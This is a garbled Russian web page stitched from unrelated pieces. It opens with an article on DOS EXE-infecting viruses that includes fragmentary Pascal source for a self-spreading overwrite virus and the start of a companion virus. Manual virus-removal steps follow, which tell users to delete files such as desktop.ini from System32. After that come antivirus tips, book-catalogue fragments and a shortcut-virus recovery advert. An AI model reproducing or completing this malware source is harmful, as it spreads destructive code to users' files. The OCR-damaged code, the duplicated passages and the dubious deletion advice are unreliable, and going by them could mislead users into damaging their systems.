В этой статье рассказано о вирусах , заражающих ЕХЕ-файлы . Приведена классификация таких вирусов , подробно рассмотрены алгоритмы их работы, отличия между ними достоинства и недостатки.

Вирусы - это хорошая гимнастика для ума, хотя многие думают, что написать вирус на языке высокого уровня весьма трудно. Это не совсем так. Писать на языке Pascal довольно легко, правда величина полученного кода вызывает благоговейный трепет.

Для каждого типа вирусов представлены исходные тексты с подробными комментариями.Также приведены основные сведения о структуре и принципах работы ЕХЕ-программы .

СОМ-файлы (небольшие программы, написанные в основном на языке Assembler) медленно, но верно устаревают. Им на смену приходят пугающие своими размерами ЕХЕ- «монстры». Появились и вирусы, умеющие заражать ЕХЕ-файлы .

Структура и процесс загрузки ЕХЕ-программы

В отличие от СОМ-программ , ЕХЕ-программы могут состоять из нескольких сегментов (кодов, данных, стека). Они могут занимать больше 64Кбайт.ЕХЕ-файл имеет заголовок, который используется при его загрузке.Заголовок состоит из форматированной части, содержащей сигнатуру и данные, необходимые для загрузки ЕХЕ-файла , и таблицы для настройки адресов (Relocation Table ). Таблица состоит из значений в формате сегмент:смещение. К смещениям в загрузочном модуле, на которые указывают значения в таблице, после загрузки программы в память должен быть прибавлен сегментный адрес, с которого загружена программа.

При запуске ЕХЕ-программы системным загрузчиком (вызовом функции DOS 4Bh) выполняются следующие действия:

1. Определяется сегментный адрес свободного участка памяти,размер

которого достаточен для размещения программы.

2.Создается и заполняется блок памяти для переменных среды.

3.Создается блок памяти для PSP и программы (сегментЮОООЬ - PSP;

сегмент+ООЮЬЮОООЬ - программа).

В поля PSP заносятся соответствующие значения.

4.Адрес DTA устанавливается равным PSP:0080h.

5.В рабочую область загрузчика считывается форматированная часть

заголовка ЕХЕ-файла .

6.Вычисляется длина загрузочного модуля по формуле:

Si7.e=((PageCnt*5i2)-(HdrSae*i6))-Pa!tP3ig.

7.Определяется смещение загрузочного модуля в файле, равное

8.Вычисляется сегментный адрес (START_SEG) для загрузки -обычно это PSP+lOh.

9.Считывается в память загрузочный модуль (начиная с адреса

START_SEG:0000).

10.Для каждого входа таблицы настройки:

a)читаются слова I_OFF и I_SEG;

b)вычисляется RELC^SEG-START^SEG+LSEG;

c)читается слово по адресу RELO_SEG:I_OFF;

d)к прочитанному слову прибавляется START_SEG;

e)результат запоминается по тому же адресу (RELO_SEG:I_OFF).

11.Распределяется память для программы в соответствии с МахМет

12.Инициализируются регистры, выполняется программа:

b) АХ=результат проверки правильности идентификаторов драйверов, указанных в командной строке;

c)SS°START_SEG+ReloSS, SP-ExeSP;

d)CS=START_SEG+ReloCS, IP=ExeIP.

Классификация ЕХЕ-вирусов

ЕХЕ-вирусы условно можно разделить на группы, используя в качестве признака для деления особенности алгоритма. Вирусы Overwrite ) Такие вирусы уже стали раритетом. Главный их недостаток - слишком грубая работа. Инфицированные программы не исполняются, так как вирус записывается поверх программного кода, не сохраняя его. При запуске вирус ищет очередную жертву (или жертвы), открывает найденный файл для редактирования и записывает свое тело в начало программы, не сохраняя оригинальный код. Инфицированные этими вирусами программы лечению не подлежат.

Вирусы-спутники (Companion)

Эти вирусы получили свое название из-за алгоритма размножения:

к каждому инфицированному файлу создается файл-спутник. Рассмотрим более подробно два типа вирусов этой группы:

Вирусы первого типа размножается следующим образом. Для каждого инфицируемого ЕХЕ-файла в том же каталоге создается файл с вирусным кодом, имеющий такое же имя, что и ЕХЕ-файл , но с расширением СОМ . Вирус активируется, если при запуске программы в командной строке указано только имя исполняемого файла. Дело в том, что, если не указано расширение файла, DOS сначала ищет в текущем каталоге файл с заданным именем и расширением СОМ . Если СОМ-файл с таким именем не найден, ведется поиск одноименного ЕХЕ-файла . Если не найден и ЕХЕ-файл , DOS попробует обнаружить ВАТ (пакетный) файл. В случае отсутствия в текущем каталоге исполняемого файла с указанным именем поиск ведется во всех каталогах, доступных по переменной PATH . Другими словами, когда пользователь хочет запустить программу и набирает в командной строке только ее имя (в основном так все и делают), первым управление получает вирус ,код которого находится в СОМ-файле . Он создает СОМ-файл еще к одному или нескольким ЕХЕ-файлам (распространяется), а затем исполняет ЕХЕ-файл с указанным в командной строке именем. Пользователь же думает, что работает только запущенная ЕХЕ-программа.

Вирус-спутник обезвредить довольно просто - достаточно удалить

СОМ-файл.

Вирусы второго типа действуют более тонко. Имя инфицируемого

ЕХЕ-файла остается прежним, а расширение заменяется каким-либо

другим, отличным от исполняемого (СОМ, ЕХЕ и ВАТ ), Например,

файл может получить расширение DAT (файл данных) или OVL (про-

граммный оверлей). Затем на место ЕХЕ-файла копируется вирусный код. При запуске такой инфицированной программы управление получает вирусный код, находящийся в ЕХЕ-файле . Инфицировав еще один или несколько ЕХЕ-файлов таким же образом, вирус возвращает оригинальному файлу исполняемое расширение (но не EХЕ, а СОМ , поскольку ЕХЕ-файл с таким именем занят вирусом), после чего исполняет его. Когда работа инфицированной программы закончена, ее запускаемому файлу возвращается расширение неисполняемого. Лечение файлов , зараженных вирусом этого типа, может быть затруднено,если вирус -спутник шифрует часть или все тело инфицируемого файла,а перед исполнением его расшифровывает.

Вирусы , внедряющиеся в программу (Parasitic) Вирусы этого вида самые незаметные: их код записывается в инфицируемую программу, что существенно затрудняет лечение зараженных файлов. Рассмотрим методы внедрения ЕХЕ-вирусов в ЕХЕ-файл .

Способы заражения ЕХЕ-файлов

Самый распространенный способ заражения ЕХЕ-файлов такой: в конец файла дописывается тело вируса , а заголовок корректируется (с сохранением оригинального) так, чтобы при запуске инфицированного файла управление получал вирус . Похоже на заражение СОМ-файлов , но вместо задания в коде перехода в начало вируса корректируется собственно адрес точки запуска программы. После окончания работы вирус берет из сохраненного заголовка оригинальный адрес запуска программы, прибавляет к его сегментной компоненте значение регистра DS или ES (полученное при старте вируса) и передает управление на полученный адрес.

Следующий способ - внедрение вируса в начало файла со сдвигом кода

программы. Механизм заражения такой: тело инфицируемой программы считывается в память, на ее место записывается вирусный код , а после него - код инфицируемой программ ы. Таким образом, код программы как бы «сдвигается» в файле на длину кода вируса. Отсюда и название способа - «способ сдвига». При запуске инфицированного файла вирус заражает еще один или несколько файлов. После этого он считывает в память код программы, записывает его в специально созданный на диске временный файл с расширением исполняемого файла (СОМ или ЕХЕ ), и затем исполняет этот файл. Когда программа закончила работу, временный файл удаляется. Если при создании вируса не применялось дополнительных приемов защиты, то вылечить инфицированный файл очень просто - достаточно удалить код вируса в начале файла, и программа снова будет работоспособной. Недостаток этого метода в том, что приходится считывать в память весь код инфицируемой программы (а ведь бывают экземпляры размером больше 1Мбайт).

Следующий способ заражения файлов - метод переноса - по всей видимости, является самым совершенным из всех перечисленных. Вирус размножается следующим образом: при запуске инфицированной программы тело вируса из нее считывается в память. Затем ведется поиск неинфицированной программы. В память считывается ее начало,по длине равное телу вируса . На это место записывается тело вируса .Начало программы из памяти дописывается в конец файла. Отсюда название метода - «метод переноса». После того, как вирус инфицировал один или несколько файлов, он приступает к исполнению программы,из которой запустился. Для этого он считывает начало инфицированной программы, сохраненное в конце файла, и записывает его в начало файла, восстанавливая работоспособность программы. Затем вирус удаляет код начала программы из конца файла, восстанавливая оригинальную длину файла, и исполняет программу. После завершения программы вирус вновь записывает свой код в начало файла, а оригинальное начало программы - в конец. Этим методом могут быть инфицированы даже антивирусы , которые проверяют свой код на целостность, так как запускаемая вирусом программа имеет в точности такой же код, как и до инфицирования.

Вирусы , замещающие программный код (Overwrite ) Как уже говорилось, этот вид вирусов уже давно мертв. Изредка появляются еще такие вирусы , созданные на языке Assembler , но это, скорее, соревнование в написании самого маленького overwrite-вируса . На данный момент самый маленький из известных overwrite-вирусов написан Reminder’ом (Death Virii Crew group) и занимает 22 байта.

Алгоритм работы overwrite-вируса следующий:

1. Открыть файл, из которого вирус получил управление.

3. Закрыть файл.

4. Искать по маске подходящий для заражения файл.

5. Если файлов больше не найдено, перейти к пункту 11.

6. Открыть найденный файл.

7. Проверить, не заражен ли найденный файл этим вирусом.

8. Если файл заражен, перейти к пункту 10.

9. Записать в начало файла код вируса.

10. Закрыть файл (по желанию можно заразить от одного до всех фай-

лов в каталоге или на диске).

11. Выдать на экран какое-либо сообщение об ошибке, например «Abnormal program termination» или «Not enough memory», - пусть пользователь не слишком удивляется тому, что программа не запустилась.

12. Завершить программу.

Ниже приведен листинг программы, заражающей файлы таким способом.

{$М 2048, 0, 0}

{Используются модули DOS и System (модуль System автоматически подключается к каждой программе при компиляции)}

(Имя вируса}

VirName=’Pain’;

{Строка для проверки на повторное заражение.

Она дописывается в заражаемый файл сразу после кода вируса }

VirLabel: String=’Pain!1;

{Длина получаемого при компиляции ЕХЕ-файла }

Author=’Dirty Nazi/SGWW.’;

{Количество заражаемых за один сеанс работы файлов}

{Массив для определения наличия копии вируса в найденном файле}

Virldentifier: Array of Char;

{Файловая переменная для работы с файлами}

(Еще одна файловая переменная - хотя без нее можно было обойтись, так будет понятнее)

{Для имени найденного файла)

TargetFile: PathStr;

(Буфер для тела вируса )

VirBuf: Array [-I.VirLen] of Char;

(Для даты/времени файла)

(Счетчик количества инфицированных файлов)

Dirlnfo: SearchRec;

LabelBuf: Array of Char;

(Инициализация)

LabelBuf :=VirLabel;

LabelBuf:=VirLabel;

LabelBuf:=VirLabel,

LabelBuf:=VirLabel;

LabelBuf:=VirLabel;

(Обнуляем счетчик количества инфицированных файлов }

(Связываем файловую переменную VirBody с именем программы из которой стартовали)

Assign(VirBody, ParamStr(O));

(Открываем файл с recsize=1 байту)

Reset(VirBody, 1);

(Считываем из файла тело вируса в массив VirBuf}

BlockRead(VirBody VirBuf, VirLen);

(Закрываем файл)

(Поиск жертвы}

procedure FindTarget;

(Функция возвращает True, если найденная программа уже заражена, и False, если еще нет}

function VirusPresent: Boolean;

VirusPresent:=False;

(Открываем найденный файл}

Assign(Target, TargetFile);

Reset(Target, 1);

(Перемещаемся на длину тела вируса от начала файла}

Seek(Target, VirLen);

(Считываем 5 байт - если файл уже заражен,там находится метка вируса }

BlockRead(Target, Virldentifier, 5);

If Virldentifier=Virl_abel Then

{Если метка есть, значит есть и вирус }

VirusPresent:=True;

(Процедура заражения}

procedure InfectFile;

{Если размер найденного файла меньше, чем длина вируса плюс 100 байт, то выходим из процедуры}

If Sr.Size < VirLen+100 Then Exit;

Если найденная программа еще не заражена, инфицируем ее}

If Not VirusPresent Then

{Запомним дату и время файла. Атрибуты запоминать не надо, так как поиск ведется среди файлов с атрибутом Archive, а этот атрибут станавливается на файл после сохранения в любом случае}

{Открываем для заражения}

Assign(Target, TargetFile);

Reset(Target, 1);

{Записывам тело вируса в начало файла}

BlockWrite(Target, VirBuf, VirLen);

{Перемещаем указатель текущей позиции а длину вируса от начала файла}

Seek(Target, VirLen);

{Вписываем метку заражения}

BlockWrite(Target, LabelBuf, 5);

{Устанавливаем дату и время файла}

SetFTime(Target, Time);

{Закрываем}

{Увеличиваем счетчик инфицированных файлов }

{Начало процедуры FindTarget}

{Ищем в текущем каталоге файлы по маске *.ЕХЕ

с атрибутами Archive }

FindFirstF.EXE’, Archive, Sr);

{Пока есть файлы для заражения}

While DosError=0 Do

If Sr.Name=» Then Exit;

(Запоминаем имя найденного файла в переменную TargetFile}

TargetFile:=Sr.Name;

{Вызываем процедуру заражения}

{Если заразили InfCount файлов, завершаем поиск}

If InfFiles > InfCount Then Exit;

{Ищем следующий файл по маске}

{Основное тело}

(Инициализируемся}

{Ищем жертвы и заражаем их}

{Выдаем на экран сообщение об ошибке}

WriteLn(‘Abnormal program termination.’);

{Это чтобы компилятор вставил в код константы VirName и Author, условие же поставлено таким образом,что эти строки никогда не будут выведены на экран}

WriteLn(VirName);

WriteLn(Author);

Вирусы-спутники (Companion)

Вирусы-спутники сейчас широко распространены - соотношение companion и parasitic вирусов примерно один к двум.Инфицирование методом создания СОМ-файла спутника Смысл этого метода - не трогая «чужого кота» (ЕХЕ-программу ), создать «своего» - СОМ-файл с именем ЕХЕ-программы . Алгоритм работы такого вируса предельно прост, так как отпадает необходимость лишних действий (например, сохранения в теле вируса длины откомпилированного ЕХЕ-файла с вирусным кодом , считывания в буфер тела вируса , запуска файла, из которого вирус получил управление). Незачем даже хранить метку для определения инфицирования файла.

Заражение производится с помощью командного процессора:

1.Если в командной строке указаны параметры, сохранить их в переменную типа String для передачи инфицированной программе.

2.Найти ЕХЕ-файл -жертву.

3.Проверить, не присутствует ли в каталоге с найденным ЕХЕ-файлом СОМ-файл с таким же именем, как у файла-жертвы.

4.Если такой СОМ-файл присутствует, файл уже заражен, переходим

к пункту 6.

5.С помощью командного процессора скопировать файл, из которого

получено управление, в файл с именем жертвы и расширением СОМ .

6.Процедурой Ехес загрузить и выполнить файл с именем стартового, но с расширением ЕХЕ - то есть выполнить инфицированную программу.

7. Вернуть управление в DOS.

Приведенный ниже листинг показывает заражение файлов этим

($М 2048, 0, 0}

(Используются модули DOS и System (модуль System автоматически

подключается к каждой программе при компиляции)}

{Имя вируса)

VirName=’Guesf;

Author=’Dirty Nazi/SGWW. 4 PVT only!’;

{Количество зараженных за один сеанс работы файлов}

{Для имени найденного файла)

TargetFile: PathStr;

без использования каких-либо программ — антивирусов

Здесь мы покажем вам, как можно самостоятельно обнаружить и затем удалить файлы, способные нанести вред вашему компьютеру, или вирусы самостоятельно (вручную) без использования каких-либо антивирусных программ.

Это несложно . Давайте начнём!

Как удалить вирус самостоятельно

Действовать необходимо на правах администратора.

Для начала надо открыть командную строку. Для этого нажмите сочетание клавиш WINDOWS + R и в появившемся окне в строке введите cmd и нажмите ОК .

Команда cmd в командной строке

Либо, нажав кнопку Пуск в нижнем левом углу экрана монитора, в строке поиска начните набирать «командная строка », а затем по найденному результату кликните правой кнопкой мышки и выберите «Запуск от имени администратора ».

Вызов командной строки через поиск

Запуск командной строки от имени администратора

Кратко о том, какие цели у наших будущих действий:

С помощью команды attrib нужно найти такие файлы, которые не должны находиться среди системных файлов и потому могут быть подозрительными.

Вообще, в C: / drive не должно содержаться никаких .exe или .inf файлов. И в папке C:\Windows\System32 также не должны содержаться какие-либо, кроме системных, скрытые или только для чтения файлы с атрибутами i, e S H R .

Итак, начнём ручной поиск подозрительных, файлов, то есть вероятных вирусов, самостоятельно, без использования специальных программ.

Откройте командную строку и вставьте cmd . Запустите этот файл от имени администратора.

Открываем cmd

Прописываем в строке cd/ для доступа к диску. Затем вводим команду attrib . После каждой команды не забываем нажимать ENTER:

Команда attrib в командной строке

Как видим из последнего рисунка, файлов с расширениями .exe или .inf не обнаружено.

А вот пример с обнаруженными подозрительными файлами:

Вирусы в системе Windows

Диск С не содержит никаких файлов .еxе и. inf , пока вы не загрузите эти файлы вручную сами . Если вы найдёте какой-либо файл, подобный тем, которые мы нашли, и он отобразит S H R , тогда это может быть вирус .

Здесь обнаружились 2 таких файла:

autorun. inf

sscv.exe

Эти файлы имеют расширения .еxе и. inf и имеют атрибуты S H R . Значит, эти файлы могут быть вирусами .

Теперь наберите attrib -s -h -г -а -i filename. extension . Или в нашем примере это:

attrib — s — h — г — а -i autorun. inf

Эта команда изменит их свойства, сделав из них обычные файлы. Дальше их можно будет удалить.

Для удаления этих файлов введите del filename. extension или в нашем случае:

del autorun.inf

То же самое надо проделать со вторым файлом:

Удаление вирусов вручную

Теперь перейдём к папке System32.

Впишите cd win* и нажмите ENTER.

Снова введите s ystem32. Нажмите ENTER.

Затем впишите команду attrib . Нажмите ENTER.

Появился вот такой длинный список:

Снова вводим внизу команду attrib , не забывая нажать потом ENTER :

И находим вот такие файлы:

Подозрительные файлы в папке Windows

При перемещении вверх-вниз экран перемещается очень быстро, поэтому когда мелькнёт что-то новое, приостановитесь и вернитесь назад‚ чтобы проверить каждый файл, не пропустив ни одного.

Подозрительные файлы в папке Windows

Выписываем себе все найденные S H R файлы :

1. atr. inf
2. dcr. exe
3. desktop. ini
4. idsev.exe

Выполните команду attrib 3 или 4 раза, чтобы убедиться, что вы проверили всё.

Ну, вот. Мы самостоятельно нашли целых 4 вредоносных файла! Теперь нам нужно удалить эти 4 вируса.

C:\Windows\System32>attrib -s -h -r -a -i atr.inf

C:\Windows\System32>del atr.inf

C:\Windows\System32>attrib -s -h -r -a -i dcr.exe

C:\Windows\System32>del dcr.exe

C:\Windows\System32>attrih -s -h -r -a -i desktop.ini

C:\Windows\\System32>del desktop.ini

C:\Windows\System32>attrib -s -h -r -a -i idsev.exe

C:\Windows\System32>del idsev.exe

Удаляем вирусы с компьютера самостоятельно

Аналогичную операцию надо провести с другими папками, вложенными в каталог Windows.

Нужно просканировать ещё несколько таких каталогов, как Appdata и Temp . Используйте команду attrib , как показано в этой статье, и удалите все файлы с атрибутами S H R, которые не имеют отношения к системным файлам и могут заразить ваш компьютер.

На сегодняшний день большинство пользователей интернета сталкиваются с проблемой, когда компьютер заражается необычными вирусами, которые оказывают негативное воздействие на исполняемые файлы. К тому же, далеко не все антивирусные программы способны с ними справиться.

Стоит разобраться, что можно сделать в сложившейся ситуации, а также рассмотреть проблему удаления вируса «EXE» с флешки.

Принцип работы вирусов, инфицирующих EXE-файлы

Проблема с активностью вирусов данного вида не является новшеством. Наиболее распространенным на сегодняшний день считается компьютерный троян-вредитель, который называется Virus.Win32.Expiro. Подцепить его в интернете не так уж и трудно, гораздо сложнее потом избавиться от вредителя. Данный вирус способен удалять EXE-файлы. Точнее сказать, он делает их недоступными для пользователя. Таким образом, при попытке открытия определенной программы после воздействия вредоносного кода вируса, исполняемый файл не распознается системой. В результате на экране отображается сообщение о том, требуемый объект не найден. Стоит отметить, что это относится не только к установленным программам, но и к первому запуску инсталлятора. Речь идет о дистрибутиве, скачанном из интернета, который находится на жестком диске.

Если производится установка программы с оптического носителя, воздействие угрозы способно проявляться позже, когда завершится данный процесс. Как известно, при инсталляции с USB-накопителя вирус перепрыгивает автоматически на него, инфицируя при этом все файлы, которые имеют расширение.exe. Однако распознать действие вируса можно лишь при запуске исполняемого файла. Поэтому, пока данный процесс не осуществлен, большинство антивирусных пакетов угроз не идентифицируют. Мало того, наличие вируса вообще не определяется.

Проблемы антивирусного программного обеспечения

Стоит рассмотреть детальнее, что и каким способом можно удалить. Вирус способен избавляться от EXE-файлов или блокировать их. Это не так уж и важно. В обоих случаях, палка о двух концах. Как известно, проблема состоит в блокировке файлов самим вирусом. В то же время, речь идет о неправильной реакции антивирусных программ. К примеру, на сегодняшний день известно много случаев, когда пакет Avast или любой другой антивирус при заданном пользователем сканировании вирус определяет.

Однако результат данного процесса сводится только к тому, что программа показывает зараженные EXE-файлы. Когда их невозможно вылечить, она удаляет их самостоятельно без предупреждения. Таким образом, стоит сказать о том, что вирус удаляет EXE-файлы не сам, а осуществляет это руками антивирусного сканера. Следует отметить, что представленный вредитель способен создавать копии и даже маскироваться под системные процессы вида svchost.

Процедура удаления вируса при зараженных EXE-файлах Если рассматривать борьбу с подобной угрозой, здесь не так все и просто, как может показаться на первый взгляд. Сначала желательно отказаться от использования бесплатных антивирусных программы типа Avast, AVG и прочих. Идеальным вариантом станет наличие в системе облачного антивируса типа Panda. Рекомендуется использовать мощное антивирусное программное обеспечение «Лаборатории Касперского» или компании ESET. Кроме того, можно воспользоваться услугами утилит типа Kaspersky Virus Removal Tool, однако сначала программу сначала необходимо записать на оптический носитель в виде портативной версии. Для этого применяется незараженный компьютер, а запуск производится именно с CD- или DVD-диска.

Если не придерживаться данных рекомендаций, трудно гарантировать успешное лечение. Кроме того, можно использовать более простые программы типа CureIt. Их действие направлено именно на лечение зараженных файлов, а не на их удаление. Так как вирус обычно находится в оперативной памяти, верным решением станет применение запуска с оптического диска программ, знакомых под общим названием Rescue Disc. Они способны проверить все компоненты системы до старта. Очень часто именно этот способ становится действенным. Стоит отметить, что данная методика оптимально подходит и для флешек. Правда, в таком случае в параметрах сканирования устройств хранения необходимо дополнительно установить отметку на USB-носителе.

Стоит надеяться, что данные рекомендации окажутся полезными для большинства пользователей. Они помогут юзерам разобраться с проблемой, как удалить вирус. Если существует хоть малейшее подозрение на его наличие, нежелательно запускать ни одну программу, пока не будет завершен полный процесс Также рекомендуется обзавестись каким-нибудь пакетом типа Internet Security, который способен предотвратить воздействие угрозы еще на начальном этапе.

Способы заражения EXE-файлов

Самый распространенный способ заражения EXE-файлов такой: в конец файла дописывается тело вируса, а заголовок корректируется (с сохранением оригинального) так, чтобы при запуске инфицированного файла управление получал вирус. Похоже на заражение COM-файлов, но вместо задания в коде перехода в начало вируса корректируется собственно адрес точки запуска программы. После окончания работы вирус берет из сохраненного заголовка оригинальный адрес запуска программы, прибавляет к его сегментной компоненте значение регистра DS или ES (полученное при старте вируса) и передает управление на полученный адрес.

Следующий способ – внедрение вируса в начало файла со сдвигом кода программы. Механизм заражения такой: тело инфицируемой программы считывается в память, на ее место записывается вирусный код, а после него – код инфицируемой программы. Таким образом, код программы как бы «сдвигается» в файле на длину кода вируса. Отсюда и название способа – «способ сдвига». При запуске инфицированного файла вирус заражает еще один или несколько файлов. После этого он считывает в память код программы, записывает его в специально созданный на диске временный файл с расширением исполняемого файла (COM или EXE), и затем исполняет этот файл. Когда программа закончила работу, временный файл удаляется. Если при создании вируса не применялось дополнительных приемов защиты, то вылечить инфицированный файл очень просто – достаточно удалить код вируса в начале файла, и программа снова будет работоспособной. Недостаток этого метода в том, что приходится считывать в память весь код инфицируемой программы (а ведь бывают экземпляры размером больше 1Мбайт).

Следующий способ заражения файлов – метод переноса – по всей видимости, является самым совершенным из всех перечисленных. Вирус размножается следующим образом: при запуске инфицированной программы тело вируса из нее считывается в память. Затем ведется поиск неинфицированной программы. В память считывается ее начало, по длине равное телу вируса. На это место записывается тело вируса. Начало программы из памяти дописывается в конец файла. Отсюда название метода – «метод переноса». После того, как вирус инфицировал один или несколько файлов, он приступает к исполнению программы, из которой запустился. Для этого он считывает начало инфицированной программы, сохраненное в конце файла, и записывает его в начало файла, восстанавливая работоспособность программы. Затем вирус удаляет код начала программы из конца файла, восстанавливая оригинальную длину файла, и исполняет программу. После завершения программы вирус вновь записывает свой код в начало файла, а оригинальное начало программы – в конец. Этим методом могут быть инфицированы даже антивирусы, которые проверяют свой код на целостность, так как запускаемая вирусом программа имеет в точности такой же код, как и до инфицирования.

Из книги Защита вашего компьютера автора Яремчук Сергей Акимович

Признаки заражения Все Spyware и Adware (за редким исключением) не наносят явного вреда компьютеру и пользователю. Такое приложение может долго работать на компьютере, а пользователь не будет ничего подозревать.Присутствие таких приложений не должно оставаться незамеченным. К

Из книги Информатика и информационные технологии: конспект лекций автора Цветкова А В

8.2. Способы борьбы со спамом Если полистать подшивки журналов конца 1990-х – начала 2000-х годов, можно обнаружить, что статей, описывающих борьбу со спамом, в них нет. Пик спамерской активности приходится на 2002–2003 годы. В это же время началась активная разработка систем

Из книги Информатика и информационные технологии автора Цветкова А В

3. Способы адресации Перечислим и затем рассмотрим особенности основных видов адресации операндов в памяти:1) прямую адресацию;2) косвенную базовую (регистровую) адресацию;3) косвенную базовую (регистровую) адресацию со смещением;4) косвенную индексную адресацию со

Из книги Защити свой компьютер на 100% от вирусов и хакеров автора Бойцев Олег Михайлович

52. Способы адресации Прямая адресацияЭто простейший вид адресации операнда в памяти, так как эффективный адрес содержится в самой команде и для его формирования не используется никаких дополнительных источников или регистров. Эффективный адрес берется

Из книги 200 лучших программ для Интернета. Популярный самоучитель автора Краинский И

Тест на лечение активного заражения В тесте принимали участие антивирусные продукты 15 производителей, среди которых Avast!, AVG, AVZ, Avira, BitDefender, Eset, F-Secure, McAfee, Panda Software, Sophos, Symantec, Trend Micro, «ВирусБлокАда», «Доктор Веб», «Лаборатория Касперского».Тест проводился на следующих

Из книги Интернет. Новые возможности. Трюки и эффекты автора Баловсяк Надежда Васильевна

Способы передачи Существуют два способа передачи потокового видео – последовательный (Progressive Streaming) и в реальном времени (Real-Time Streaming).При передаче последовательным способом качество изображения всегда лучше, поскольку видео воспроизводится с жесткого диска

Из книги Интернет – легко и просто! автора Александров Егор

Пути заражения Самые популярные способы заражения следующие.– Через Интернет, так называемым «добровольным» cпособом: когда пользователь скачивает что-либо из Сети. Очень часто под безобидным ускорителем браузера может сидеть самый настоящий WIN95. CIH (WIN95. CIH, или

Из книги Быстрые деньги в Интернете автора

Способы поиска Поиск в каталогах не представляет затруднений и интуитивно понятен. Чтобы найти в них необходимую информацию (если, конечно, она там присутствует), достаточно всего лишь обладать здравым смыслом.Пусть, к примеру, вам необходимо найти сайт газеты «Труд».

Из книги Удвоение продаж в интернет-магазине автора Парабеллум Андрей Алексеевич

Из книги Linux: Полное руководство автора Колисниченко Денис Николаевич

Способы оплаты Поговорим о самом приятном в любой работе – о зарплате. Ведь деньги так или иначе являются основной целью вашего труда. Однако, к сожалению, их получение связано с некоторыми трудностями, возникающими вследствие больших расстояний между вами и

Из книги Готовимся к пенсии: осваиваем Интернет автора Ахметзянова Валентина Александровна

Признаки заражения Рассмотрим основные признаки, указывающие на вероятность заражения вашего компьютера вирусом. Конечно, большинство из них не может со стопроцентной точностью сообщить, что ваш компьютер заражен – часть признаков иногда наблюдается и на совершенно

Из книги автора

Способы борьбы Вирусы – это зло, а со злом нужно бороться. Однако прежде всего стоит вспомнить одну прописную истину – недопущение войны лучше любой победы. По этой причине в первую очередь необходимо минимизировать опасность попадания вирусов на ваш компьютер, а лишь

Из книги автора

Из книги автора

Способы оплаты Что касается способов оплаты в интернет-магазине, то вы должны предоставить своим клиентам как можно больше возможностей оплатить заказ. Как показывает практика, чем больше выбор вариантов оплаты, тем выше конверсия (рис. 15). Если клиент не находит в

Из книги автора

26.1. Способы взаимодействия Процессы, как и люди, могут «общаться» между собой, то есть обмениваться информацией. В главе 3 мы бегло рассмотрели два средства межпроцессного взаимодействия (IPC, Inter-Process Communication); полудуплексные каналы (конвейеры) и сигналы, но в UNIX-системах

Из книги автора

Способы заработка Пенсионеру не так-то легко найти работу, и единственная, пожалуй, тому причина - возраст. Но в виртуальном пространстве возраст не имеет никакого значения. Здесь все равны: пионеры и пенсионеры, здоровые и инвалиды. Все зависит от умения и

Читайте, как удалить вирус преобразующий файлы и папки в ярлыки . Как восстановить данные, которые утеряны в результате деятельности такого вируса. Ваши файлы и папки на USB флешке или карте памяти стали ярлыками? USB флешка или карта памяти после подключения к компьютеру отображается как ярлык? Ищете как восстановить данные и удалить вирус, преобразовывающий файлы и папки в ярлыки? Вы используете антивирус, но компьютер все равно был инфицирован? К сожалению не все антивирусы могут защитить вас такого заражения.

Разновидности вирусов ярлыков

На сегодня наиболее распространены 2 типа вирусов, создающих ярлыки: первые создают ярлыки вместо файлов и папок на флешке или карте памяти, другие создают ярлыки съемных дисков вместо самих флешек, внешних USB дисков и карт памяти.

Названия наиболее распространенных вирусов:

• Bundpil.Shortcu;
• Mal/Bundpil-LNK;
• Ramnit.CPL;
• Serviks.Shortcut;
• Troj/Agent-NXIMal/FakeAV-BW;
• Trojan.Generic.7206697 (B);
• Trojan.VBS.TTE (B);
• Trojan.VBS.TTE;
• VBS.Agent-35;
• VBS.Serviks;
• VBS/Autorun.EY worm;
• VBS/Autorun.worm.k virus;
• VBS/Canteix.AK;
• VBS/Worm.BH;
• W32.Exploit.CVE-2010_2568-1;
• W32.Trojan.Starter-2;
• W32/Sality.AB.2;
• Win32/Ramnit.A virus;
• Worm:VBS/Cantix.A;

Вирус, преобразующий файлы и папки в ярлыки

Этот вирус дублирует ваши файлы и папки, затем прячет и заменяет их. Вирус представляет комбинацию вирусов трояна и червя. Опасность заключается в том, что вы запускаете вирус каждый раз, когда хотите открыть ваш файл или папку. После запуска вирус распространяет себя заражая все большее количество файлов и часто устанавливает дополнительно вредоносное ПО которое может украсть данные о паролях и кредитных картах, сохраненных у вас на компьютере.

Вирус, преобразующий флешки и карты памяти в ярлыки

Это чистокровный троянский вирус, который скрывает любые съемные устройства, подключенные к компьютеру и заменяет их ярлыками этих устройств. Каждый раз кликая по ярлыку вы снова запускаете вирус, который ищет на вашем компьютере финансовую информацию и отправляет ее мошенникам, создавшим вирус.

Что делать в случае заражения

К сожалению не все антивирусы могут вовремя обнаружить опасность и защитить вас от инфицирования. Поэтому наилучшей защитой будет не использовать автоматический запуск съемных устройств и не кликать по ярлыкам файлов, папок или дисков. Будьте внимательны и не кликайте по ярлыкам, которые вы не создавали сами. Вместо двойного клика для открытия диска, кликните по нему правой кнопкой мышки и выберите Развернуть в Проводнике.

Восстановление данных удаленных вирусом

Для надежного восстановления данных удаленных таким типом вирусов используйте Hetman Partition Recovery . Поскольку программа использует низкоуровневые функции по работе с диском, она обойдет вирусную блокировку и прочитает все ваши файлы.

Загрузите и установите программу , затем проанализируйте зараженную флешку или карту памяти. Проведите восстановление информации до очистки носителя от вируса . Наиболее надежным вариантом лечения будет очистка флешки с помощью команды DiskPart, это удалит всю информацию на ней.

Удаление вируса с карты памяти или USB флешки

После восстановления данных с флешки вы можете её полностью очистить с помощью утилиты DiskPart. Удаление всех файлов и форматирование устройства может оставить вирус, который спрячется в загрузочном секторе, таблице разделов или на неразмеченной области диска. Как правильно очистить флешку смотрите в видео.

Удаление вируса с флешки с помощью командной строки

Данный способ не позволяет гарантированно очистить флешку от всех видов вирусов, но сможет удалить вирус, который создает ярлыки вместо файлов. Вам не нужно будет скачивать и устанавливать сторонние утилиты, удаление производится с помощью встроенного в любую версию Windows инструмента.

Удаление вируса с компьютера

Наиболее простым и надежным способом очистки компьютера от вируса будет полная переустановка Windows с удалением системного раздела.

Но если вы являетесь опытным пользователем, вы можете опробовать следующий способ: